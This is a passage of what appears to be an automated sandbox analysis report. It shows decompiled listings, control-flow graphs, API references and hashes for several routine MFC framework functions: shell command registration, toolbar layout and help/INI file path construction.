                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?), ref: 00427214
                    • Part of subcall function 00427206: lstrlenA.KERNEL32(?,80000000,?,?), ref: 0042724D
                    • Part of subcall function 00427206: RegSetValueExA.KERNELBASE(?,00000000,00000000,00000001,?,00000001), ref: 00427262
                    • Part of subcall function 00427206: RegCloseKey.ADVAPI32(?), ref: 0042726D
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Namelstrlen$CloseCursorDestroyExtractFileH_prolog3IconModulePathShortValue
                  • String ID: "%1"$ /dde$ /p "%1"$ /pt "%1" "%2" "%3" "%4"$%s\DefaultIcon$%s\ShellNew$%s\shell\open\%s$%s\shell\print\%s$%s\shell\printto\%s$,%d$NullFile$[open("%1")]$[print("%1")]$[printto("%1","%2","%3","%4")]$command$ddeexec
                  • API String ID: 519677498-4043335175
                  • Opcode ID: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction ID: 9143f19bdfc8b7c6ecc2443052c1ae3c958a6745bc1d14e11510287793223560
                  • Opcode Fuzzy Hash: fa335e7d5f54601939ab60626600fbe5f1b4d029b047e4cf50c6b1b1f199abd5
                  • Instruction Fuzzy Hash: FFE17D31A04119ABCB14EBA5DC92FBFB774AF14318F64022AF521772E2DB385944CB69
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00413B62, Relevance: 21.4, APIs: 14, Instructions: 421COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 189 413b62-413b74 190 413b76 call 406436 189->190 191 413b7b-413b98 call 421213 IsRectEmpty 189->191 190->191 195 413bc0-413bc9 call 40f898 191->195 196 413b9a-413bbe 191->196 195->190 201 413bcb-413be1 GetClientRect 195->201 200 413be4-413bf1 196->200 202 413bf3-413bf7 200->202 203 413bf9-413c05 BeginDeferWindowPos 200->203 201->200 204 413c08-413c2f 202->204 203->204 205 413c35-413c5a call 413638 call 40b917 204->205 206 413fd9-413fe2 204->206 219 413c60-413c6c 205->219 220 413f52-413f54 205->220 208 413ff2-414012 SetRectEmpty 206->208 209 413fe4-413fe7 206->209 214 414014-414017 208->214 215 414019-41401d 208->215 209->208 211 413fe9-413fec KiUserCallbackDispatcher 209->211 211->208 214->215 217 414029-41402c 214->217 215->217 218 41401f-414027 215->218 221 414033-414038 217->221 222 41402e-414031 217->222 218->217 230 413c72-413c7a 219->230 231 413f3c-413f40 219->231 223 413fc0-413fcf 220->223 224 413f56-413f5a 220->224 225 414045-41404b 221->225 226 41403a-414042 221->226 222->221 222->225 223->205 228 413fd5-413fd7 223->228 224->223 229 413f5c-413f66 224->229 226->225 228->206 232 413f93-413f9f 229->232 233 413f68-413f77 229->233 237 413c85-413c91 230->237 238 413c7c-413c7e 230->238 231->223 236 413f42-413f50 231->236 234 413fa1 232->234 235 413fa3-413faa 232->235 239 413f79 233->239 240 413f7b-413f82 233->240 234->235 243 413fac 235->243 244 413fae-413fb9 235->244 236->223 246 413c94-413cd2 call 41335b GetWindowRect call 422bfb 237->246 238->237 245 413c80-413c83 238->245 239->240 241 413f84 240->241 242 413f86-413f91 240->242 241->242 247 413fbc 242->247 243->244 244->247 245->246 254 413e21-413e27 246->254 255 413cd8-413cde 246->255 247->223 256 413e45-413e4d 254->256 257 413e29-413e33 254->257 258 413ce0-413cea 255->258 259 413cfc-413d04 255->259 261 413e4f-413e59 256->261 262 413e7e-413e82 256->262 257->256 260 413e35-413e3f OffsetRect 257->260 258->259 263 413cec-413cf6 OffsetRect 258->263 264 413d35-413d39 259->264 265 413d06-413d10 259->265 260->256 261->262 266 413e5b-413e6a 261->266 267 413ea3-413eaf 262->267 268 413e84-413ea1 OffsetRect 262->268 263->259 270 413d3f-413d56 OffsetRect 264->270 271 413dce-413dda 264->271 265->264 269 413d12-413d21 265->269 272 413e6c 266->272 273 413e6e-413e78 OffsetRect 266->273 276 413ed3-413ee3 EqualRect 267->276 277 413eb1-413eb5 267->277 268->276 278 413d23 269->278 279 413d25-413d2f OffsetRect 269->279 274 413d5c-413d6c EqualRect 270->274 271->274 275 413ddc-413de0 271->275 272->273 273->262 280 413dae-413dc0 274->280 281 413d6e-413d78 274->281 275->274 282 413de6-413dfc call 40b917 275->282 284 413f22-413f37 276->284 285 413ee5-413eef 276->285 277->276 283 413eb7-413ecd call 40b917 277->283 278->279 279->264 280->236 291 413dc6-413dc9 280->291 288 413d7a-413d81 281->288 289 413d9e-413da9 call 40cee2 281->289 282->274 300 413e02-413e1c call 4260f4 282->300 283->276 283->300 284->236 290 413f39 284->290 286 413ef1-413ef8 285->286 287 413f12-413f1d call 40cee2 285->287 286->287 294 413efa-413f10 286->294 287->284 288->289 295 413d83-413d9c 288->295 289->280 290->231 291->236 294->287 295->289 300->224
                  C-Code - Quality: 88%
                  			E00413B62(intOrPtr* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, signed int _a12) {
				intOrPtr* _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				void* _v40;
				signed int _v44;
				struct tagRECT _v64;
				struct tagRECT _v80;
				struct tagRECT _v96;
				signed int _v128;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t181;
				intOrPtr _t185;
				signed int _t187;
				intOrPtr _t192;
				intOrPtr _t193;
				signed int _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t202;
				signed int _t203;
				signed int _t205;
				signed int _t206;
				signed int _t211;
				signed int _t215;
				intOrPtr _t223;
				intOrPtr _t224;
				signed int _t229;
				signed int _t230;
				intOrPtr _t231;
				intOrPtr _t235;
				signed int* _t238;
				signed int _t240;
				signed int _t245;
				int _t246;
				int _t249;
				long _t252;
				intOrPtr _t253;
				signed int _t259;
				signed int* _t267;
				signed int _t268;
				void* _t275;
				intOrPtr* _t285;
				signed int _t286;
				signed int _t287;
				signed int _t288;
				signed int _t295;
				signed int* _t306;
				signed int _t313;
				signed int _t321;
				intOrPtr _t322;
				intOrPtr _t323;
				intOrPtr _t336;
				void* _t338;
				intOrPtr* _t340;
				intOrPtr* _t341;
				signed int _t349;
				signed int _t350;
				intOrPtr* _t351;
				signed int _t354;

				_t291 = __ecx;
				_t285 = __ecx;
				_v8 = __ecx;
				_t357 = __ecx;
				if(__ecx != 0) {
					L2:
					E00421213(_a4, _a8, _a12);
					_t348 = _t285 + 0xb4;
					if(IsRectEmpty(_t285 + 0xb4) != 0) {
						_t291 = _t285;
						_t181 = E0040F898(_t285);
						__eflags = _t181;
						if(__eflags == 0) {
							goto L1;
						} else {
							GetClientRect( *(_t181 + 0x20),  &_v80);
							_t185 = _v80.right - _v80.left;
							_t295 = _v80.bottom - _v80.top;
							__eflags = _t295;
							goto L6;
						}
					} else {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *((intOrPtr*)( *_t285 + 0x148))( &_v64, _a12);
						_t185 = _v64.right - _v64.left;
						_t295 = _v64.bottom - _v64.top;
						L6:
						_v28 = _t295;
						_v32 = _t185;
						if( *((intOrPtr*)(_t285 + 0xb0)) == 0) {
							_v128 = BeginDeferWindowPos( *(_t285 + 0xa4));
						} else {
							_v128 = _v128 & 0x00000000;
						}
						_t286 =  *0x466520; // 0x2
						_t349 =  *0x466524; // 0x2
						_t340 = _v8;
						_t187 = 0;
						_t350 =  ~_t349;
						_t287 =  ~_t286;
						_v44 = _t350;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						if( *((intOrPtr*)(_t340 + 0xa4)) <= 0) {
							L76:
							_t351 = _a4;
							if( *((intOrPtr*)(_t340 + 0xb0)) == _t187 && _v128 != _t187) {
								EndDeferWindowPos(_v128); // executed
							}
							SetRectEmpty( &_v96);
							 *((intOrPtr*)( *_t340 + 0x148))( &_v96, _a12);
							if(_a8 == 0 || _a12 == 0) {
								_t192 =  *_t351;
								if(_t192 != 0) {
									 *_t351 = _v96.left - _v96.right + _t192;
								}
							}
							if(_a8 == 0 || _a12 != 0) {
								_t193 =  *((intOrPtr*)(_t351 + 4));
								if(_t193 != 0) {
									 *((intOrPtr*)(_t351 + 4)) = _v96.top - _v96.bottom + _t193;
								}
							}
							return _t351;
						} else {
							do {
								_t341 = E00413638(_v8, _v12);
								_v24 = _t341;
								_t198 =  *(E0040B917(_v8 + 0x9c, _v12));
								if(_t341 == 0) {
									__eflags = _t198;
									if(_t198 != 0) {
										goto L74;
									}
									L61:
									__eflags = _v16;
									if(_v16 != 0) {
										__eflags = _a12;
										_t200 = _v16;
										_t306 = _a4;
										if(_a12 == 0) {
											_t287 = _t287 + _t200 -  *0x466520;
											_t202 =  *_t306;
											__eflags = _t202 - _t287;
											if(_t202 <= _t287) {
												_t202 = _t287;
											}
											 *_t306 = _t202;
											_t203 = _t306[1];
											__eflags = _t203 - _t350;
											if(_t203 <= _t350) {
												_t203 = _t350;
											}
											_t306[1] = _t203;
											_t354 =  *0x466524; // 0x2
											_t350 =  ~_t354;
											_v44 = _t350;
										} else {
											_t350 = _t350 + _t200 -  *0x466524;
											_t205 =  *_t306;
											__eflags = _t205 - _t287;
											_v44 = _t350;
											if(_t205 > _t287) {
												_t287 = _t205;
											}
											_t206 = _t306[1];
											__eflags = _t206 - _t350;
											 *_t306 = _t287;
											if(_t206 <= _t350) {
												_t206 = _t350;
											}
											_t306[1] = _t206;
											_t288 =  *0x466520; // 0x2
											_t287 =  ~_t288;
										}
										_t154 =  &_v16;
										 *_t154 = _v16 & 0x00000000;
										__eflags =  *_t154;
									}
									goto L74;
								}
								if( *((intOrPtr*)( *_t341 + 0x168))() == 0) {
									L58:
									__eflags = _v20;
									if(_v20 != 0) {
										goto L74;
									}
									L59:
									 *((intOrPtr*)( *_t341 + 0x16c))( &_v128);
									goto L74;
								}
								_t211 =  *(_t341 + 0x84);
								if((_t211 & 0x00000004) == 0 || (_t211 & 0x00000001) == 0) {
									asm("sbb eax, eax");
									_t215 = ( ~(_t211 & 0x0000a000) & 0xfffffffa) + 0x10;
									__eflags = _t215;
								} else {
									_t215 = 6;
								}
								 *((intOrPtr*)( *_t341 + 0x140))( &_v40, 0xffffffff, _t215);
								E0041335B( &_v64, _t287, _t350, _v40, _v36);
								GetWindowRect( *(_t341 + 0x20),  &_v80);
								E00422BFB(_v8,  &_v80);
								if(_a12 == 0) {
									_t223 = _v80.top;
									__eflags = _t223 - _v64.top;
									if(_t223 > _v64.top) {
										_t322 = _v8;
										__eflags =  *(_t322 + 0x98);
										if( *(_t322 + 0x98) == 0) {
											_t249 = _t223 - _v64.top;
											__eflags = _t249;
											OffsetRect( &_v64, 0, _t249);
										}
									}
									_t224 = _v64.bottom;
									_t313 = _v28;
									__eflags = _t224 - _t313;
									if(_t224 > _t313) {
										_t336 = _v8;
										__eflags =  *(_t336 + 0x98);
										if( *(_t336 + 0x98) == 0) {
											_t321 = _t313 - _t224 - _v64.top -  *0x466524;
											__eflags = _t321 - _t350;
											_t245 = _t321;
											if(_t321 <= _t350) {
												_t245 = _t350;
											}
											_t246 = _t245 - _v64.top;
											__eflags = _t246;
											OffsetRect( &_v64, 0, _t246);
										}
									}
									__eflags = _v20;
									if(_v20 == 0) {
										__eflags = _v64.top - _v28 -  *0x466524;
										if(_v64.top < _v28 -  *0x466524) {
											goto L51;
										}
										__eflags = _v12;
										if(_v12 <= 0) {
											goto L51;
										}
										_t238 = E0040B917(_v8 + 0x9c, _v12 - 1);
										__eflags =  *_t238;
										if( *_t238 != 0) {
											goto L37;
										}
										goto L51;
									} else {
										_t240 =  *0x466524; // 0x2
										_v20 = _v20 & 0x00000000;
										OffsetRect( &_v64, 0,  ~(_v64.top + _t240));
										L51:
										_t229 = EqualRect( &_v64,  &_v80);
										__eflags = _t229;
										if(_t229 == 0) {
											_t231 = _v8;
											__eflags =  *(_t231 + 0xb0);
											if( *(_t231 + 0xb0) == 0) {
												__eflags =  *(_t341 + 0x84) & 0x00000001;
												if(( *(_t341 + 0x84) & 0x00000001) == 0) {
													_t235 = _v24;
													__eflags =  *((intOrPtr*)(_t235 + 0x94)) + 0x94;
													asm("movsd");
													asm("movsd");
													asm("movsd");
													asm("movsd");
													_t341 = _t235;
												}
											}
											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
										}
										_t230 = _v40;
										_t350 = _v64.top -  *0x466524 + _v36;
										__eflags = _v16 - _t230;
										_v44 = _t350;
										if(_v16 > _t230) {
											goto L59;
										} else {
											_v16 = _t230;
											goto L58;
										}
									}
								} else {
									_t252 = _v80.left;
									if(_t252 > _v64.left &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										OffsetRect( &_v64, _t252 - _v64.left, 0);
									}
									_t253 = _v64.right;
									_t323 = _v32;
									if(_t253 > _t323 &&  *((intOrPtr*)(_v8 + 0x98)) == 0) {
										OffsetRect( &_v64, _t275 - _v64.left, 0);
									}
									if(_v20 == 0) {
										__eflags = _v64.left - _v32 -  *0x466520;
										if(_v64.left < _v32 -  *0x466520) {
											goto L27;
										}
										__eflags = _v12;
										if(_v12 <= 0) {
											goto L27;
										}
										_t267 = E0040B917(_v8 + 0x9c, _v12 - 1);
										__eflags =  *_t267;
										if( *_t267 == 0) {
											goto L27;
										}
										L37:
										_push(1);
										_push(0);
										E004260F4(_t287, _v8 + 0x9c, 1, _v12);
										_v20 = 1;
										goto L61;
									} else {
										_t268 =  *0x466520; // 0x2
										_v20 = _v20 & 0x00000000;
										OffsetRect( &_v64,  ~(_t268 + _v64.left), 0);
										L27:
										if(EqualRect( &_v64,  &_v80) == 0) {
											if( *((intOrPtr*)(_v8 + 0xb0)) == 0 && ( *(_t341 + 0x84) & 0x00000001) == 0) {
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t350 = _v44;
												_t341 = _v24;
											}
											E0040CEE2( &_v128,  *(_t341 + 0x20),  &_v64);
										}
										_t259 = _v36;
										_t287 = _v40 -  *0x466520 + _v64.left;
										if(_v16 <= _t259) {
											_v16 = _t259;
										}
										goto L59;
									}
								}
								L74:
								_v12 = _v12 + 1;
								_t199 = _v8;
							} while (_v12 <  *((intOrPtr*)(_t199 + 0xa4)));
							_t340 = _t199;
							_t187 = 0;
							goto L76;
						}
					}
				}
				L1:
				E00406436(_t285, _t291, _t338, _t348, _t357);
				goto L2;
			}






































































                  0x00413b62
                  0x00413b6b
                  0x00413b6f
                  0x00413b72
                  0x00413b74
                  0x00413b7b
                  0x00413b84
                  0x00413b89
                  0x00413b98
                  0x00413bc0
                  0x00413bc2
                  0x00413bc7
                  0x00413bc9
                  0x00000000
                  0x00413bcb
                  0x00413bd2
                  0x00413bde
                  0x00413be1
                  0x00413be1
                  0x00000000
                  0x00413be1
                  0x00413b9a
                  0x00413ba2
                  0x00413ba3
                  0x00413ba4
                  0x00413bab
                  0x00413bac
                  0x00413bb8
                  0x00413bbb
                  0x00413be4
                  0x00413beb
                  0x00413bee
                  0x00413bf1
                  0x00413c05
                  0x00413bf3
                  0x00413bf3
                  0x00413bf3
                  0x00413c08
                  0x00413c0e
                  0x00413c14
                  0x00413c17
                  0x00413c19
                  0x00413c1b
                  0x00413c23
                  0x00413c26
                  0x00413c29
                  0x00413c2c
                  0x00413c2f
                  0x00413fd9
                  0x00413fd9
                  0x00413fe2
                  0x00413fec
                  0x00413fec
                  0x00413ff6
                  0x00414007
                  0x00414012
                  0x00414019
                  0x0041401d
                  0x00414027
                  0x00414027
                  0x0041401d
                  0x0041402c
                  0x00414033
                  0x00414038
                  0x00414042
                  0x00414042
                  0x00414038
                  0x0041404b
                  0x00413c35
                  0x00413c35
                  0x00413c46
                  0x00413c4e
                  0x00413c56
                  0x00413c5a
                  0x00413f52
                  0x00413f54
                  0x00000000
                  0x00000000
                  0x00413f56
                  0x00413f56
                  0x00413f5a
                  0x00413f5c
                  0x00413f60
                  0x00413f63
                  0x00413f66
                  0x00413f99
                  0x00413f9b
                  0x00413f9d
                  0x00413f9f
                  0x00413fa1
                  0x00413fa1
                  0x00413fa3
                  0x00413fa5
                  0x00413fa8
                  0x00413faa
                  0x00413fac
                  0x00413fac
                  0x00413fae
                  0x00413fb1
                  0x00413fb7
                  0x00413fb9
                  0x00413f68
                  0x00413f6e
                  0x00413f70
                  0x00413f72
                  0x00413f74
                  0x00413f77
                  0x00413f79
                  0x00413f79
                  0x00413f7b
                  0x00413f7e
                  0x00413f80
                  0x00413f82
                  0x00413f84
                  0x00413f84
                  0x00413f86
                  0x00413f89
                  0x00413f8f
                  0x00413f8f
                  0x00413fbc
                  0x00413fbc
                  0x00413fbc
                  0x00413fbc
                  0x00000000
                  0x00413f5a
                  0x00413c6c
                  0x00413f3c
                  0x00413f3c
                  0x00413f40
                  0x00000000
                  0x00000000
                  0x00413f42
                  0x00413f4a
                  0x00000000
                  0x00413f4a
                  0x00413c72
                  0x00413c7a
                  0x00413c8c
                  0x00413c91
                  0x00413c91
                  0x00413c80
                  0x00413c82
                  0x00413c82
                  0x00413c9f
                  0x00413cb0
                  0x00413cbc
                  0x00413cc9
                  0x00413cd2
                  0x00413e21
                  0x00413e24
                  0x00413e27
                  0x00413e29
                  0x00413e2c
                  0x00413e33
                  0x00413e35
                  0x00413e35
                  0x00413e3f
                  0x00413e3f
                  0x00413e33
                  0x00413e45
                  0x00413e48
                  0x00413e4b
                  0x00413e4d
                  0x00413e4f
                  0x00413e52
                  0x00413e59
                  0x00413e64
                  0x00413e66
                  0x00413e68
                  0x00413e6a
                  0x00413e6c
                  0x00413e6c
                  0x00413e6e
                  0x00413e6e
                  0x00413e78
                  0x00413e78
                  0x00413e59
                  0x00413e7e
                  0x00413e82
                  0x00413eac
                  0x00413eaf
                  0x00000000
                  0x00000000
                  0x00413eb1
                  0x00413eb5
                  0x00000000
                  0x00000000
                  0x00413ec5
                  0x00413eca
                  0x00413ecd
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00413e84
                  0x00413e84
                  0x00413e8c
                  0x00413e9b
                  0x00413ed3
                  0x00413edb
                  0x00413ee1
                  0x00413ee3
                  0x00413ee5
                  0x00413ee8
                  0x00413eef
                  0x00413ef1
                  0x00413ef8
                  0x00413efa
                  0x00413f03
                  0x00413f0c
                  0x00413f0d
                  0x00413f0e
                  0x00413f0f
                  0x00413f10
                  0x00413f10
                  0x00413ef8
                  0x00413f1d
                  0x00413f1d
                  0x00413f2b
                  0x00413f2e
                  0x00413f31
                  0x00413f34
                  0x00413f37
                  0x00000000
                  0x00413f39
                  0x00413f39
                  0x00000000
                  0x00413f39
                  0x00413f37
                  0x00413cd8
                  0x00413cd8
                  0x00413cde
                  0x00413cf6
                  0x00413cf6
                  0x00413cfc
                  0x00413cff
                  0x00413d04
                  0x00413d2f
                  0x00413d2f
                  0x00413d39
                  0x00413dd7
                  0x00413dda
                  0x00000000
                  0x00000000
                  0x00413ddc
                  0x00413de0
                  0x00000000
                  0x00000000
                  0x00413df4
                  0x00413df9
                  0x00413dfc
                  0x00000000
                  0x00000000
                  0x00413e02
                  0x00413e08
                  0x00413e09
                  0x00413e14
                  0x00413e19
                  0x00000000
                  0x00413d3f
                  0x00413d3f
                  0x00413d47
                  0x00413d56
                  0x00413d5c
                  0x00413d6c
                  0x00413d78
                  0x00413d95
                  0x00413d96
                  0x00413d97
                  0x00413d98
                  0x00413d99
                  0x00413d9c
                  0x00413d9c
                  0x00413da9
                  0x00413da9
                  0x00413db7
                  0x00413dba
                  0x00413dc0
                  0x00413dc6
                  0x00413dc6
                  0x00000000
                  0x00413dc0
                  0x00413d39
                  0x00413fc0
                  0x00413fc0
                  0x00413fc3
                  0x00413fc9
                  0x00413fd5
                  0x00413fd7
                  0x00000000
                  0x00413fd7
                  0x00413c2f
                  0x00413b98
                  0x00413b76
                  0x00413b76
                  0x00000000

                  APIs
                  • IsRectEmpty.USER32 ref: 00413B90
                  • GetWindowRect.USER32 ref: 00413CBC
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClientRect.USER32 ref: 00413BD2
                  • BeginDeferWindowPos.USER32 ref: 00413BFF
                  • OffsetRect.USER32(?,?,00000000), ref: 00413CF6
                  • OffsetRect.USER32(?,?,00000000), ref: 00413D2F
                  • OffsetRect.USER32(?,00000002,00000000), ref: 00413D56
                  • EqualRect.USER32 ref: 00413D64
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E3F
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E78
                  • OffsetRect.USER32(?,00000000,?), ref: 00413E9B
                  • EqualRect.USER32 ref: 00413EDB
                  • KiUserCallbackDispatcher.NTDLL(?), ref: 00413FEC
                  • SetRectEmpty.USER32(?), ref: 00413FF6
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Rect$Offset$EmptyEqualWindow$BeginCallbackClientDeferDispatcherException@8H_prolog3ThrowUser
                  • String ID:
                  • API String ID: 3576052098-0
                  • Opcode ID: d683042e509441e1f4c974bac9cc01ab42b27de317ac2ed517fd49ba6fe9a68c
                  • Instruction ID: 5a4b077b88add1b12872ffce2bc9f70bb062d40a4a35f0a38eb10edef1dfd08d
                  • Opcode Fuzzy Hash: d683042e509441e1f4c974bac9cc01ab42b27de317ac2ed517fd49ba6fe9a68c
                  • Instruction Fuzzy Hash: 48022831E00209EFDF14CFA8D984BEEBBB5BF08306F14416AE515E7251D778AA81CB58
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0042FE1C, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 122COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 303 42fe1c-42fe61 call 41f363 GetModuleFileNameA 306 42fe63-42fe65 303->306 307 42fe67 call 42282a 303->307 306->307 308 42fe6c-42fe81 PathFindExtensionA 306->308 307->308 310 42fe83 call 42282a 308->310 311 42fe88-42fea7 call 42fddc 308->311 310->311 315 42fea9 call 42282a 311->315 316 42feae-42feb2 311->316 315->316 318 42feb4-42fec6 call 433ccf 316->318 319 42fecd-42fed2 316->319 318->319 331 42fec8 call 4063fe 318->331 321 42ff07-42ff0e 319->321 322 42fed4-42feec call 41b239 319->322 323 42ff10-42ff1d 321->323 324 42ff5b-42ff5f 321->324 333 42fef7 322->333 334 42feee-42fef5 322->334 329 42ff26 323->329 330 42ff1f-42ff24 323->330 327 42ff93-42ffa1 call 430650 324->327 328 42ff61-42ff8d call 4317a1 call 4048c1 call 433ccf 324->328 328->327 328->331 337 42ff2b-42ff4c call 414fee call 433ccf 329->337 330->337 331->319 339 42fefa-42ff05 call 433ccf 333->339 334->339 337->331 352 42ff52-42ff58 337->352 339->321 339->331 352->324
                  C-Code - Quality: 62%
                  			E0042FE1C(void* __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				char _v268;
				char _v528;
				char _v784;
				char* _v788;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t35;
				long _t41;
				char* _t44;
				void* _t57;
				intOrPtr _t60;
				intOrPtr _t65;
				void* _t68;
				void* _t70;
				void* _t74;
				void* _t75;
				void* _t76;
				void* _t77;
				void* _t79;
				void* _t80;
				signed int _t84;
				void* _t85;

				_t74 = __edx;
				_t71 = __ecx;
				_t82 = _t84;
				_t85 = _t84 - 0x310;
				_t35 =  *0x463404; // 0x38a11573
				_v8 = _t35 ^ _t84;
				_push(_t68);
				_push(_t75);
				_t79 = __ecx;
				_t76 = E0041F363(_t68, _t75, __ecx, __eflags);
				 *(_t76 + 8) =  *(_t79 + 0x44);
				 *(_t76 + 0xc) =  *(_t79 + 0x44);
				_t41 = GetModuleFileNameA( *(_t79 + 0x44),  &_v268, 0x104);
				if(_t41 == 0 || _t41 == 0x104) {
					E0042282A(_t71);
				}
				_t44 = PathFindExtensionA( &_v268); // executed
				_v788 = _t44;
				if(_t44 == 0) {
					E0042282A(_t71);
				}
				 *_v788 = 0;
				if(E0042FDDC( &_v268,  &_v528, 0x104) != 0) {
					E0042282A(_t71);
				}
				if( *((intOrPtr*)(_t79 + 0x60)) == 0) {
					_t65 = E00433CCF( &_v528);
					_pop(_t71);
					 *((intOrPtr*)(_t79 + 0x60)) = _t65;
					_t93 = _t65;
					if(_t65 == 0) {
						L10:
						E004063FE(0x104, _t71, _t76, _t79, _t93);
					}
				}
				_t49 =  *((intOrPtr*)(_t79 + 0x50));
				if(_t49 == 0) {
					if(E0041B239(0x104, _t71, _t76, _t79, 0xe000,  &_v784, 0x100) == 0) {
						_push( *((intOrPtr*)(_t79 + 0x60)));
					} else {
						_push( &_v784);
					}
					_t49 = E00433CCF();
					 *((intOrPtr*)(_t79 + 0x50)) = _t49;
					_pop(_t71);
					if(_t49 == 0) {
						goto L10;
					}
				}
				 *((intOrPtr*)(_t76 + 0x10)) = _t49;
				if( *((intOrPtr*)(_t79 + 0x64)) == 0) {
					_t57 =  &_v8 - _v788;
					if( *((intOrPtr*)(_t79 + 0x6c)) != 1) {
						_push(".HLP");
					} else {
						_push(".CHM");
					}
					_push(_t57);
					_push(_v788);
					E00414FEE(0x104, _t74, _t76, _t79);
					_t85 = _t85 + 0xc;
					_t60 = E00433CCF( &_v268);
					_pop(_t71);
					 *((intOrPtr*)(_t79 + 0x64)) = _t60;
					if(_t60 == 0) {
						goto L10;
					} else {
						_t49 = _v788;
						 *_v788 = 0;
					}
				}
				if( *((intOrPtr*)(_t79 + 0x68)) == 0) {
					E004048C1(0x104, _t71, _t76, _t79, E004317A1(_t74,  &_v528, 0x104, ".INI"));
					_t49 = E00433CCF( &_v528);
					_t85 = _t85 + 0x14;
					 *((intOrPtr*)(_t79 + 0x68)) = _t49;
					if(_t49 == 0) {
						goto L10;
					}
				}
				_pop(_t77);
				_pop(_t80);
				_pop(_t70);
				return E00430650(_t49, _t70, _v8 ^ _t82, _t74, _t77, _t80);
			}




























                  0x0042fe1c
                  0x0042fe1c
                  0x0042fe1f
                  0x0042fe21
                  0x0042fe27
                  0x0042fe2e
                  0x0042fe31
                  0x0042fe33
                  0x0042fe34
                  0x0042fe3b
                  0x0042fe40
                  0x0042fe46
                  0x0042fe59
                  0x0042fe61
                  0x0042fe67
                  0x0042fe67
                  0x0042fe73
                  0x0042fe79
                  0x0042fe81
                  0x0042fe83
                  0x0042fe83
                  0x0042fe8e
                  0x0042fea7
                  0x0042fea9
                  0x0042fea9
                  0x0042feb2
                  0x0042febb
                  0x0042fec0
                  0x0042fec1
                  0x0042fec4
                  0x0042fec6
                  0x0042fec8
                  0x0042fec8
                  0x0042fec8
                  0x0042fec6
                  0x0042fecd
                  0x0042fed2
                  0x0042feec
                  0x0042fef7
                  0x0042feee
                  0x0042fef4
                  0x0042fef4
                  0x0042fefa
                  0x0042feff
                  0x0042ff02
                  0x0042ff05
                  0x00000000
                  0x00000000
                  0x0042ff05
                  0x0042ff07
                  0x0042ff0e
                  0x0042ff13
                  0x0042ff1d
                  0x0042ff26
                  0x0042ff1f
                  0x0042ff1f
                  0x0042ff1f
                  0x0042ff2b
                  0x0042ff2c
                  0x0042ff32
                  0x0042ff3d
                  0x0042ff41
                  0x0042ff46
                  0x0042ff47
                  0x0042ff4c
                  0x00000000
                  0x0042ff52
                  0x0042ff52
                  0x0042ff58
                  0x0042ff58
                  0x0042ff4c
                  0x0042ff5f
                  0x0042ff74
                  0x0042ff80
                  0x0042ff85
                  0x0042ff88
                  0x0042ff8d
                  0x00000000
                  0x00000000
                  0x0042ff8d
                  0x0042ff96
                  0x0042ff97
                  0x0042ff9a
                  0x0042ffa1

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: __strdup$ExtensionFileFindModuleNamePath_strcat_s
                  • String ID: .CHM$.HLP$.INI
                  • API String ID: 1153805871-4017452060
                  • Opcode ID: 5a2cfcf0a266f3ba9807a91fb32b2f27e91d7bb497108997dc917048d7d32576
                  • Instruction ID: ddaf0331e0f280528f6596423df915eadd577d6b01de0391df7aa35ddabab8c3
